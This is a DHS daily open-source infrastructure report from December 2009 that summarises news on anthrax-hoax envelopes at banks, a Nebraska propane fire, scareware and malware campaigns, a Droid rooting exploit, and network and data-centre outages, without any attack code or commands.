Department of Homeland Security Daily Open Source Infrastructure Report

Monday, December 14, 2009

Complete DHS Daily Report for December 14, 2009

Daily Report

Top Stories

 WNBC 4 New York reports that the offices of the American Express headquarters in downtown New York were evacuated on December 10 after several suspicious envelopes containing a “white powdery substance” were discovered. Seven envelopes in all were sent to various locations in Manhattan, including the JP Morgan headquarters, but there was nothing to indicate they were any real threat. (See item 14 below in the Banking and Finance Sector)

 According to the Omaha World-Herald, a propane-fueled fire at a dairy production and processing plant in Norfolk, Nebraska caused approximately 7,000 people to be evacuated on December 10. The fire was put out after crews managed to shut valves that cut off the flow from a 30,000-gallon propane tank. (See item 19)

19. December 10, Omaha World-Herald – (Nebraska) Norfolk fire now extinguished; evacuation lifted. A propane-fueled fire at a dairy production and processing plant in Norfolk, Nebraska caused roughly one-third of the city (approximately 7,000 people) to be evacuated on December 10. A city administrator said the fire was put out after crews managed to shut valves that cut off the flow from a 30,000-gallon propane tank. The fire at the Protient plant broke out around 7 a.m. and fears that the tank itself might explode prompted officials to order the evacuation. In addition to homes, the area includes dozens of businesses, five public elementary schools, a junior high school, the city’s main shopping center, its motel corridor and the southern half of downtown. S. Highway 81 was closed at the Nebraska Highway 32 junction, and U.S. Highway 275 was closed at Nebraska Highway 24. The city administrator said two unmanned fire units sprayed water on the blaze because it was too dangerous for crews to get close. Protient closed the plant one year ago. Just days ago, it was leased by an Illinois company with plans to return it to full production, the Norfolk Daily News reported. The city administrator said the propane tank threatened by the fire was filled on Wednesday. Ten to 12 workers inside the plant at the time the fire broke out escaped. There were no reports of injuries. Norfolk is about 100 miles northwest of Omaha. Source:


Banking and Finance Sector

12. December 10, IDG News Services – (International) Microsoft joins Swiss vendor to push SQL Server in banks. Microsoft and Swiss banking systems provider Temenos have joined forces to push SQL Server in the banking sector, the companies said today. SQL Server will be used as part of Temenos’ core banking system, T24, which is the back-office system that manages accounts and customer information, and lets banks offer other financial services, said the global alliances director at Temenos. One of the advantages of using SQL Server is lower cost, the director said. However, banks are cautious; stability, security and performance have to be proved before they adopt a product. The reliability of SQL Server is not questioned, according to the director. But showing that SQL Server can perform on the same level as Oracle and IBM is something the two companies have to do. Banks are not convinced, he said. Microsoft and Temenos will work together to demonstrate that SQL Server’s performance can equal or surpass other databases, according to the director. However, lab tests won’t be enough. Most banks do not want to be the first to use a product, so showing that others are already using SQL Server and T24 will be important. For example, North Shore Credit Union has started using both, according to a statement. Source:

13. December 10, WFTS 28 Tampa – (Florida) White powder scare forces Tampa office building evacuation. An office building on Gandy Boulevard was evacuated after a white powder was found inside an envelope that had been mailed there Thursday afternoon. According to a Tampa Fire Rescue spokesman the envelope was delivered to the Bank of America building at 4109 Gandy just before 1:00 p.m. It contained a white powder and a threat. He would not elaborate on the nature of the threat. The building is an operations center for Bank of America, not a branch. Sixteen people were directly exposed to the substance. They are being evaluated at the scene. At least 100 people were evacuated from the building but were allowed back inside shortly after 2 p.m, after hazmat crews and postal inspectors determined the substance was not dangerous. Source:

14. December 10, WNBC 4 New York – (New York) Anthrax scare at American Express HQ. Employees at the American Express headquarters at 3 World Financial Center downtown had an anthrax scare on December 10 and three floors had to be evacuated. Several suspicious envelopes containing a “white powdery substance” were discovered in the financial giant’s offices at 200 Vesey Street sometime before 3 p.m., sources inside of the company told AmEx officials immediately contacted authorities, and the building’s 39th, 40th, and 51st floors — where the envelopes were discovered — were evacuated. The building’s heating and air-conditioning system was also turned off, according to an internal memo. The investigation was still ongoing in the early evening, and officials said it was too soon to tell if there was any toxicity in the malicious missives. Some employees who came in contact with the powder were scrubbed down by hazmat crews. Later police officials said that seven envelopes in all were sent to various locations in Manhattan, including the JP Morgan headquarters, but there was nothing to indicate they were any real threat. They were all sent from Maryland, the officials said. Source:

Information Technology

37. December 11, ComputerWorld – (International) Rather than patch, Microsoft blocks buggy code. Microsoft has decided to disable a 17-year-old video codec in older versions of Windows rather than patch multiple vulnerabilities, according to the company’s security team. On December 8, the same day it issued six updates that patched 12 bugs, Microsoft released a security advisory that outlined the unusual move, which blocks the Indeo codec — software that compresses and decompresses video data — from being used by either Internet Explorer (IE) or Windows Media Player. The update also prevents other applications that access the Internet from loading the codec. It is unclear exactly how many unpatched vulnerabilities the Indeo codec contains, but at least two security companies — VeriSign iDefense and Fortinet — issued their own Indeo bug alerts on December 8. The vulnerability uncovered by iDefense was reported to Microsoft more than a year ago. The update targets only the oldest editions of Microsoft’s operating system: Windows 2000, Windows XP and Windows Server 2003. Windows Vista, Windows 7 and Windows Server 2008 already bar the Indeo codec from loading. Intel introduced the codec in 1992. By blocking the codec from being used in IE and Windows Media Player, said Microsoft, it’s protecting users against the known attack vectors, would rely on duping people into visiting a malicious site. It is unusual for Microsoft to skip patching known vulnerabilities and instead disable — “deprecate” in programming terminology — bits of code. “This is a rare occurrence, as it is usually challenging to remove functionally from products that customers are currently using without affecting existing applications,” a Microsoft spokesman acknowledged via e-mail on December 10. Source:

38. December 10, The Register – (International) Scareware slingers flaunt fake MS endorsement. Scareware wronguns have developed a neat but evil piece of coding trickery designed to dupe prospective marks into believing that Microsoft is endorsing their worthless scamware. A rogue anti-malware product called DefenceLab redirects infected PCs to Microsoft’s Support portal, but modifies the HTML content as it returns so as to appear as if Microsoft is endorsing the worthless software. The ploy, which follows a fake scan and bogus Windows Security Center alert, is designed to persuade Windows users already exposed to infection by agents of the scareware package to pay for a full version of the supposed clean-up utility. Surfers visiting the URL on the Windows Support site referenced in the scareware from a clean PC will get a 404 ‘page not found’ message. Hacked PC victims will see an apparent endorsement. Screenshots of the attack in action can be found in a blog post by anti-spyware firm Sunbelt Software, which was the first to warn of the threat. Source:

39. December 10, DarkReading – (International) Droid smartphone hacked. First the iPhone, now the Droid: A hacker has unleashed an exploit that lets a user wrest administrative root control of his or her Motorola Droid smartphone. The code, which was posted on the AllDroid online forum, lets a user gain root privileges to either Motorola Droid Android 2.0 or Android 2.0.1 version phones. That basically means a user can run whatever themes, gadgets, and applications he or she wants — akin to a jailbroken iPhone. The Droid, which is based on Google’s Android operating system, runs on Verizon’s network. Unlocking or jailbreaking comes with its risks, too, of course: Not only could it possibly “brick” or render the device unoperational and deactivate its warranty, but a jailbroken phone also leaves the door open for malware writers. The director of security operations for nCircle, says the danger to enterprises is that users could then work around any IT security policies. Treat mobile devices like laptops, he says. “Now you have this mobile device where an end user can continually make any changes that he desires. Now it becomes an untrusted platform, and it’s unknown what the user has done, installed, or subverted,” whether the user realizes it or not, he says. “Enterprise IT should be concerned.” Just what the “rooted” Droid means for consumer users is unclear, the director says. “It’s still too early to say what a rooted Android looks like... It’s only been 48 hours since the [exploit] went public,” he says. Source:

40. December 10, ComputerWorld – (International) Droid Eris software update starts from Verizon. Verizon Wireless started pushing an over-the-air update to Droid Eris smartphones today with eight software fixes designed to improve performance. The improvements address concerns that some online forum users had considered inconveniences with the Eris, built by HTC. None were apparently as serious as problems with the Motorola Droid that Verizon addressed in 14 software fixes that it started sending in an over-the-air update that began on Monday. Both phones run on the Android operating system. In both cases, the updates are being sent to customers in phases, each to last about a week. Customers will get an alert of the update and will have to accept the download, a Verizon spokeswoman said. The fixes for the Eris include allowing picture messages from LG phones to be opened and improving SMS and MMS messaging delivery. A delay that first-time users experienced in receiving their first call on activation has also been eliminated, Verizon said. With the Motorola Droid, the update’s 14 fixes include reducing a voice echo that hundreds of online forum users said was a problem for people receiving a call from a Droid phone. However, the phased-in rollout of the update appears not to have reached some customers on Motorola’s support forum where it couldn’t be determined whether the update is addressing the echo. Some comments indicate user frustration with continuing to wait for the update. Source:

41. December 10, The Register – (International) Potent malware link infects almost 300,000 webpages. A security researcher has identified a new attack that has infected almost 300,000 webpages with links that direct visitors to a potent cocktail of malicious exploits. The SQL injection attacks started in late November and appear to be the work of a relatively new malware gang, said a researcher with ScanSafe, a web security firm recently acquired by Cisco Systems. Hacked sites contain an invisible iframe that silently redirects users to 318x .com (a space has been added to protect the clueless), which goes on to exploit known vulnerabilities in at least five applications. At time of writing, this web search showed more than 294,000 webpages that contained the malicious script. Infected sites included yementimes .com, parisattitude .com and knowledgespeak .com. People who visit infected pages receive an invisible link that pulls code from a series of sites tied to 318x .com. The code looks for insecure versions of Adobe Flash, Internet Explorer, and several other Microsoft applications, and when they are detected it exploits them to surreptitiously install malware known as Backdoor.Win3.Buzus.croo. The rootkit-enabled program logs banking credentials and may do other nefarious bidding, the researcher said. At the moment, about two percent of the requests ScanSafe sees are for sites infected by the malicious link, an indication the threat is significant, she said. SQL injection attacks prey on web applications that fail to adequately inspect user supplied input before passing it off to a webserver’s backend database. They are a favorite way of adding malicious links and content to third-party websites and were also the chink that allowed hackers the toehold they needed to steal more than 130 million credit card numbers from card processor Heartland Payment Systems and four other companies. Source:

42. December 10, Computer Weekly – (International) Goverments must unite to head off cyber-terrorism threat, says Kaspersky. Governments have begun working to combat cyber threats, but many are working on national initiatives to tackle a global problem, says Russian security firm Kaspersky Lab. “To fix this problem, governments need to think internationally,” said the chief executive and co-founder of Kaspersky Lab. In an increasingly digital world, where all systems, including those for critical national infrastructures, are connected to the internet, every person, business and economy is at risk of cyber attack, he said. Although cybercrime is a big and growing problem, cyber terrorism is an even greater concern, said the chief executive. “We have not seen any real instances of cyber terrorism yet, but it is technically possible and just about everyone depends on the internet,” he said. The Conficker worm has shown that criminals are able to build botnets of millions of hijacked computers. “This means it is possible to build a botnet that has the power to halt the internet, but this threat is still not fully understood,” said the chief executive. “The capability exits to do very serious damage. Not only for money, but to scare people, which is the definition of terrorism,” he told Computer Weekly. Source:

For another story, see Item 35 below

35. December 10, Associated Press – (International) Feds go global to fight cybercriminals overseas. Concerned about the rise in sophisticated computer attacks from abroad, the FBI and the U.S. Secret Service are beefing up their international cybercrime enforcement, sending agents who specialize in the threats overseas to specifically deal with digital perils. Their growing coordination with other nations, however, faces legal and political challenges posed by conflicting laws and the lack of broadly accepted international guidelines for Internet oversight. “With the increased connectivity in countries that heretofore didn’t have that amount of access, and the technological advances made in corporate America that have put vulnerable financial information online, it’s been the perfect storm,” said the assistant director of the FBI’s cyber division. So far, he said, the FBI has set up new cybercrime offices in four countries, including Romania, Estonia and the Netherlands, and is hoping to add two or three more over the next year. He would not name the fourth country. The cybercrime specialists operate in addition to the 61 legal attache offices the FBI has overseas. “We’ve gotten so many requests (for help in overseas cases) that we actually have started to embed FBI personnel into the national police agencies of a number of countries,” he said. The U.S. Secret Service, meanwhile, is setting up an electronic crimes task force office in Rome, and adding a field office in Tallinn, Estonia. While the Secret Service declined to discuss specific staffing, the agency now includes some computer training for all of its 3,400 agents. According to officials, countries in Eastern Europe, Africa and South America — including Nigeria, Brazil, Ukraine, and until recently Romania — have become burgeoning sanctuaries for hackers because of weak law enforcement. Source:

Communications Sector

43. December 11, ISP Review – (International) London Internet exchange failure slows UK ISP Internet traffic. The London Internet Exchange (LINX) suffered a major failure during Thursday afternoon after one of its crucial network switches was knocked offline by an unspecified software fault. Hundreds of UK and European Broadband ISPs connect through LINX’s HUB, and the impact upon Internet traffic during the fault is clearly visible in their usage graph. At its worst, LINX lost just over 100Gbps of traffic to the outage, which is just over one third of its average normal load for the affected period. The service has since been returned to a normal and stable state of operation. Source:

44. December 11, WFED 1500 Radio – (Utah) Admin. Babbitt: Human error, not technology, behind November FAA outage. The head of the Federal Aviation Administration (FAA) told FederalNewsRadio that they are a little closer to finding the cause of a telecommunications SNAFU that snarled air traffic across the country. “Preliminary reports show us, not shockingly, it was a human error,” said he in an interview on the Federal Drive. “We had a router being replaced, routinely, in an upgrade situation. While during the installation, they turned one of the warning systems off and didn’t turn it back on.” FAA earlier said the November 19 incident began with the failure of a single circuit board in a router. A backup circuit board also failed. As a result, misinformation was sent to FAA computer centers near Atlanta and Salt Lake City. It was four hours before the glitch was fixed. The Administrator stressed he believes the failure was a “unique one-off. I think the one thing that everyone should be aware of: We had no compromise of safety in this outage. We had no loss of radio communications, radar coverage... all of our separation... Air Traffic Control was working just fine.” Source:

45. December 10, Web Host Industry Review – (Virginia) Amazon data center power loss causes EC2 disturbances. An Amazon Web Services data center was disrupted for about five hours due to an apparent power outage, causing some Amazon EC2 cloud users to experience problems with their workloads. InformationWeek reported that a segment of Amazon’s Eastern US hosting services experienced problems early Wednesday morning, slowing down EC2 cloud instances in its East-1 region for a five-hour period according to status reports posted on Amazon’s Service Health Dashboard as it worked to restore customer workloads. While Amazon did not specify the location of the facility, Amazon Web Services is known to operate a Washington DC-area data center near McLean in Northern Virginia. Source:

For another story, see item 42 above in the Information Technology Sector